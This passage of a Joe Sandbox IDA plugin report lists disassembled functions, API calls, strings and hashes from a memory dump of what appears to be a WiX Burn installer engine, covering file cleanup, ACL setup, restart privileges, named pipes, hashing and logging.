dirutil.cpp, xrefs: 007C3C75, 007C3EF9
DEL, xrefs: 007C3E6C
4#v, xrefs: 007C3CF5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4#v$*.*$DEL$dirutil.cpp
API String ID: 1544372074-4118715877
Opcode ID: c011b10f2b738c7c0ff2a94de8a196879caf27444706880711d0539682f3c233
Instruction ID: 885a40109a1ba0a1ebcdc17693105e46d87997860d4723c31243c74e6e0fde95
Opcode Fuzzy Hash: c011b10f2b738c7c0ff2a94de8a196879caf27444706880711d0539682f3c233
Instruction Fuzzy Hash: D4B1DD71E40234AAEB315A758C44FAA77F5EF44750F0182ADED09F7190D77A8E80CBA0

Function 008015CB Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0080166B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801675
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 008016C2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008016C8
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00801702
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801708
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00801748
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0080174E
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0080178E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00801794
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 008017D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008017DA
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 008018BD
LocalFree.KERNEL32(?), ref: 008019DC

Strings

srputil.cpp, xrefs: 00801696

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CreateKnownWell$DescriptorEntriesFreeInitializeLocalSecurity
String ID: srputil.cpp
API String ID: 3627156773-4105181634
Opcode ID: 0fab25969a1b3679ebbcbad4894c497d548a15b7fe0f97038df0eef8e85ffac1
Instruction ID: 0afa446beba6ade4964463b707b83715708981fd893f8fc1ae762dc6c786fffb
Opcode Fuzzy Hash: 0fab25969a1b3679ebbcbad4894c497d548a15b7fe0f97038df0eef8e85ffac1
Instruction Fuzzy Hash: 21B16971D4172CABEB609BA58D48BEBB6FCFF08750F014266ED19F7150E7709D808AA4

Function 007EC0FA Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 364COMMON

Download Yara Rule

Strings

Failed to copy repair arguments for related bundle package, xrefs: 007EC398
Failed to allocate memory for dependency providers., xrefs: 007EC481
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 007EC40C
pseudobundle.cpp, xrefs: 007EC141, 007EC17A, 007EC269, 007EC475
Failed to copy install arguments for related bundle package, xrefs: 007EC34C
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 007EC186
Failed to copy key for pseudo bundle payload., xrefs: 007EC1BB
Failed to copy filename for pseudo bundle., xrefs: 007EC1DF
Failed to copy key for pseudo bundle., xrefs: 007EC30A
-%ls, xrefs: 007EC114
Failed to copy download source for pseudo bundle., xrefs: 007EC231
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 007EC14D
Failed to copy local source path for pseudo bundle., xrefs: 007EC203
Failed to copy version for pseudo bundle., xrefs: 007EC4D0
Failed to append relation type to repair arguments for related bundle package, xrefs: 007EC3B9
Failed to copy cache id for pseudo bundle., xrefs: 007EC327
Failed to copy display name for pseudo bundle., xrefs: 007EC4F2
Failed to copy uninstall arguments for related bundle package, xrefs: 007EC3EB
Failed to allocate memory for pseudo bundle payload hash., xrefs: 007EC275
Failed to append relation type to install arguments for related bundle package, xrefs: 007EC371

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: de5a78ed3f48db0a7725777a763bb123ffd24bb2a5fde95598433ec806065670
Instruction ID: beb777b84aceb22077d57b730730480c4a373724ff29162b0069c1f5d30c47e2
Opcode Fuzzy Hash: de5a78ed3f48db0a7725777a763bb123ffd24bb2a5fde95598433ec806065670
Instruction Fuzzy Hash: 7FC1E275A016D6EBDB12DE69C851FAA7BA8FF0D310F044129FA15EB342D738EC119B90

Function 007D69CC Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 358synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 007CD39D: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,007D6E4B,000000B8,00000000,?,00000000,7694B390), ref: 007CD3AC
Part of subcall function 007CD39D: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 007CD3BB
Part of subcall function 007CD39D: LeaveCriticalSection.KERNEL32(000000D0,?,007D6E4B,000000B8,00000000,?,00000000,7694B390), ref: 007CD3D0

ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 007D6D9A
CloseHandle.KERNEL32(00000000), ref: 007D6DA3
CloseHandle.KERNEL32(@G|,?,00000000,?,00000000,00000001,00000000), ref: 007D6DC0

Strings

@G|, xrefs: 007D6CBC, 007D6C0B, 007D6AB3, 007D6CDB, 007D6CF5, 007D6DBF
Another per-machine setup is already executing., xrefs: 007D6BD9
Another per-user setup is already executing., xrefs: 007D6AF1
Failed to set initial apply variables., xrefs: 007D6B18
Failed to cache user to working directory., xrefs: 007D6B7F
core.cpp, xrefs: 007D6A9C, 007D6C76
UX aborted apply begin., xrefs: 007D6AA6
user cannot start apply because it is busy with another action., xrefs: 007D6A2F
Failed to register bundle., xrefs: 007D6C00
crypt32.dll, xrefs: 007D6CD2
Failed to elevate., xrefs: 007D6BA5
Failed while caching, aborting execution., xrefs: 007D6CA8
Failed to create cache thread., xrefs: 007D6C80

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCriticalHandleSection$CompareEnterExchangeInterlockedLeaveMutexRelease
String ID: @G|$Another per-machine setup is already executing.$Another per-user setup is already executing.$user cannot start apply because it is busy with another action.$Failed to cache user to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 322611130-1770454996
Opcode ID: 1aece514d6851d5e6ccfd163b8524d93e5ede2509e9180eb9e045a655e7e2de4
Instruction ID: 3a20fc5a5db5fec77d0f83d83879a47bb4d3f6aa87b9c51eb368c3fbd779f9e0
Opcode Fuzzy Hash: 1aece514d6851d5e6ccfd163b8524d93e5ede2509e9180eb9e045a655e7e2de4
Instruction Fuzzy Hash: 98C18FB1A01616EBDF199BA4D845BEEBBB9FF04314F00422FE515E6341DB38A9548BA0

Function 007C44E9 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 137COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 007C4512
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007C4519
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007C4523
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 007C4573
GetLastError.KERNEL32 ref: 007C457D
CloseHandle.KERNEL32(?), ref: 007C4677

Strings

Failed to get shutdown privilege LUID., xrefs: 007C45AB
Failed to schedule restart., xrefs: 007C4662
user.cpp, xrefs: 007C4547, 007C45A1, 007C45EF, 007C4658
Failed to get process token., xrefs: 007C4551
SeShutdownPrivilege, xrefs: 007C4566
Failed to adjust token to add shutdown privileges., xrefs: 007C45F9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
API String ID: 4232854991-1583736410
Opcode ID: bfc8b632115b7a67fff5efbd736cc3bb9e48fe061dac38d221770448b71c054e
Instruction ID: 80fe54334be7723995dddb8e899a633664e1067cd35cd82bb24ad124b267cec6
Opcode Fuzzy Hash: bfc8b632115b7a67fff5efbd736cc3bb9e48fe061dac38d221770448b71c054e
Instruction Fuzzy Hash: F941F572A40724BBE7605BB99C89FBB77A8FB01750F01412DFE01F6290E6784D0086E5

Function 007D4CE8 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 161pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 007D4D16
GetLastError.KERNEL32(?,00000000,?,?,007C442A,?), ref: 007D4D1F
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,007C442A,?), ref: 007D4DC0
GetLastError.KERNEL32(?,007C442A,?), ref: 007D4DCD
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,007C442A,?), ref: 007D4E93
LocalFree.KERNEL32(00000000,?,007C442A,?), ref: 007D4EC1

Strings

Failed to allocate full name of cache pipe: %ls, xrefs: 007D4E2A
\\.\pipe\%ls, xrefs: 007D4D77
pipe.cpp, xrefs: 007D4D43, 007D4DF1, 007D4E77
Failed to create the security descriptor for the connection event and pipe., xrefs: 007D4D4D
Failed to create pipe: %ls, xrefs: 007D4DFE, 007D4E84
\\.\pipe\%ls.Cache, xrefs: 007D4E14
Failed to allocate full name of pipe: %ls, xrefs: 007D4D8D
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 007D4D11

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: DescriptorErrorLastSecurity$CloseConvertCreateFreeHandleLocalNamedPipeString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 3065245045-3253666091
Opcode ID: aca298e672407c91d9bf69fbec35be28efc0b0f92f1e3ed6ce4aad64b851af68
Instruction ID: 5565f564a3dc0ce74544e4f3c7462d325cea5f997382310df4c3d02fa4c41fae
Opcode Fuzzy Hash: aca298e672407c91d9bf69fbec35be28efc0b0f92f1e3ed6ce4aad64b851af68
Instruction Fuzzy Hash: 64518071E40715BBEB119BA4DC46BEEBBB8FF04710F10412AFD11E62D0D3795E909A91

Function 007FF961 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,007D9CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 007FF9C6
GetLastError.KERNEL32 ref: 007FF9D0
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 007FFA0D
GetLastError.KERNEL32 ref: 007FFA17
CryptDestroyHash.ADVAPI32(00000000), ref: 007FFAC9
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007FFAE0
GetLastError.KERNEL32 ref: 007FFAFB
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 007FFB33
GetLastError.KERNEL32 ref: 007FFB3D
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 007FFB76
GetLastError.KERNEL32 ref: 007FFB84

Strings

cryputil.cpp, xrefs: 007FFAB0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CryptErrorLast$Hash$Context$AcquireCreateDestroyFileParamPointerRelease
String ID: cryputil.cpp
API String ID: 1716956426-2185294990
Opcode ID: df8077c10412de22a93a6d6c8f525ba3c742fee0de0b0794bb1715d54ea3a1c4
Instruction ID: bf0f25c8b6391b70127274f9ae31bff7e5424b8b55ef047b8b5a070ad3e27eee
Opcode Fuzzy Hash: df8077c10412de22a93a6d6c8f525ba3c742fee0de0b0794bb1715d54ea3a1c4
Instruction Fuzzy Hash: C8518732E40268ABEB719B658C04BE776E8FF09741F018175FE4DF6290E7748D809AE4

Function 007D9C99 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

Failed to create unverified path., xrefs: 007D9D69
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 007D9DC6
Failed to transfer working path to unverified path for payload: %ls., xrefs: 007D9D9F
Failed to reset permissions on unverified cached payload: %ls, xrefs: 007D9DEC
Failed to get cached path for package with cache id: %ls, xrefs: 007D9CC3
moving, xrefs: 007D9E2C, 007D9E34
copying, xrefs: 007D9E27
Failed to move verified file to complete payload path: %ls, xrefs: 007D9E68
Failed to concat complete cached path., xrefs: 007D9CEF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: fd15357670308ec95a5ab1d7cbf114acb16d20f7597e9c9ab065af6be767b966
Instruction ID: 828bea9943079fca2537bd921fa326b061154342ccc741dc3c5f0782cdf99cae
Opcode Fuzzy Hash: fd15357670308ec95a5ab1d7cbf114acb16d20f7597e9c9ab065af6be767b966
Instruction Fuzzy Hash: D7514172940519FBDF126B94CD02FDEBB76EF04710F104166FA00B53A1E77A5EA0AB92

Function 007C6184 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 007C61D2
GetLastError.KERNEL32 ref: 007C61DC

Strings

Failed to get OS info., xrefs: 007C620A
Failed to set variant value., xrefs: 007C6314
variable.cpp, xrefs: 007C6200

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: 04b666c3a43e6b92e49d487ea01f1d0982ea6216a69f45e1920573def5ad8469
Instruction ID: 88a60b3ceb75f0425226caabac319214ba962f869fb77cc0ad8ab94a1760388d
Opcode Fuzzy Hash: 04b666c3a43e6b92e49d487ea01f1d0982ea6216a69f45e1920573def5ad8469
Instruction Fuzzy Hash: 81419671E00268ABDB20DBA9CC85FEB7BB8FB89710F10419EF505E7140D6789E91CB90

Function 007FFDC2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0082B60C,00000000,?,?,?,?,007E1014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFDF0
GetCurrentProcessId.KERNEL32(00000000,?,007E1014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFE00
GetCurrentThreadId.KERNEL32 ref: 007FFE09
GetLocalTime.KERNEL32(8007139F,?,007E1014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFE1F
LeaveCriticalSection.KERNEL32(0082B60C,?,00000000,00000000,0000FDE9), ref: 007FFF12

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 007FFEB9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: 5b78d200d41dbac407fa75776faede36ef689858d54ec45e360a063be5e683e7
Instruction ID: bae099be6548d926391a1d1107d06677525cafc30fa1c9dc5d3bcb31d5030963
Opcode Fuzzy Hash: 5b78d200d41dbac407fa75776faede36ef689858d54ec45e360a063be5e683e7
Instruction Fuzzy Hash: A3415172D01219EBDB20DBA4DC45ABEB7F9FF08711F144026FA01E2251EB389D85DBA1

Function 007D993E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 007D99ED
lstrlenW.KERNEL32(?), ref: 007D9A14
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D9A74
FindClose.KERNEL32(00000000), ref: 007D9A7F

Part of subcall function 007C3BC3: GetFileAttributesW.KERNEL32(?,?,?,?,00000001,00000000,?), ref: 007C3C3F
Part of subcall function 007C3BC3: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3C52

Strings

*.*, xrefs: 007D99C7
.unverified, xrefs: 007D9981

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: 4c4f8e8fa690d3b3dffa46981827936f3cc942c5e7a8c43ee47bd5a4d2b25105
Instruction ID: 2cd3773667af013edce1ea3c08f6a5ae6484e8336066a07288934e1f75a49b90
Opcode Fuzzy Hash: 4c4f8e8fa690d3b3dffa46981827936f3cc942c5e7a8c43ee47bd5a4d2b25105
Instruction Fuzzy Hash: 1B41717190056CAEDB60AB64DC4DBEAB7B8FF84701F4041A6E608E11A0EB788EC4DF14

Function 00808733 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 00808788
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 0080879A

Strings

feclient.dll, xrefs: 00808762
crypt32.dll, xrefs: 00808758
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 00808771
%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 008087E3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: 00f5536b476e4d31ba1e343f22b3d90efa4fb9147f9dc7674410d9ebd7b4f0a3
Instruction ID: 59c552d8a182afa98e80ccf5c53af1395126b3772ccbb9c8bdf56311601dd14b
Opcode Fuzzy Hash: 00f5536b476e4d31ba1e343f22b3d90efa4fb9147f9dc7674410d9ebd7b4f0a3
Instruction Fuzzy Hash: 8B212AA6901128FAD7649B969C05FBBB3FCFB48B01F10445AF994D2180E738AE80D770

Function 007FA85E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 007FA9A4

Strings

1#IND, xrefs: 007FBB9C
1#INF, xrefs: 007FBBB1
1#QNAN, xrefs: 007FBBAA
1#SNAN, xrefs: 007FBBA3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 957d91246b95d7077f04f6060c87265e13a15477188633b736797f70d88f77c1
Instruction ID: e37624b80831fd716f07966b7778bb3b0f4dcfed43cbe5153f0c750d54394286
Opcode Fuzzy Hash: 957d91246b95d7077f04f6060c87265e13a15477188633b736797f70d88f77c1
Instruction Fuzzy Hash: 2AC228B1E0862C9BDB25CE28DD407AAB7B9EB84345F1441EAD54DE7340E778AE818F41

Function 007C60BA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 007C60EA
GetLastError.KERNEL32 ref: 007C60F4

Strings

Failed to set variant value., xrefs: 007C6138
variable.cpp, xrefs: 007C6112
Failed to get the user name., xrefs: 007C611C

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastNameUser
